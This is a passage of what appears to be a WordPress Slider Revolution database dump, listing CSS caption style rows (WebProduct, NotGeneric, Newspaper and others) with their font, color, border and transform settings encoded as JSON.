",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(79,'.tp-caption.WebProduct-SubTitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(80,'.tp-caption.WebProduct-Content','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(81,'.tp-caption.WebProduct-Menuitem','{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(82,'.tp-caption.WebProduct-Title-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(83,'.tp-caption.WebProduct-SubTitle-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(84,'.tp-caption.WebProduct-Content-Light','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(85,'.tp-caption.FatRounded','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"20px\",\"22px\",\"20px\",\"25px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.5\",\"border-color\":\"#d3d3d3\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"50px\",\"50px\",\"50px\",\"50px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(86,'.tp-caption.NotGeneric-Title','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"70px\",\"font-weight\":\"800\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 0px 10px 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"[object Object]\",\"hover\":\"\"}'),(87,'.tp-caption.NotGeneric-SubTitle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"4px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(88,'.tp-caption.NotGeneric-CallToAction','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"10px 30px 10px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(89,'.tp-caption.NotGeneric-Icon','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"default\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(90,'.tp-caption.NotGeneric-Menuitem','{\"hover\":\"true\",\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":\"27px 30px 27px 30px\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(91,'.tp-caption.MarkerStyle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}'),(92,'.tp-caption.Gym-Menuitem','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(93,'.tp-caption.Newspaper-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(94,'.tp-caption.Newspaper-Subtitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(95,'.tp-caption.Newspaper-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(96,'.tp-caption.Newspaper-Title-Centered','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\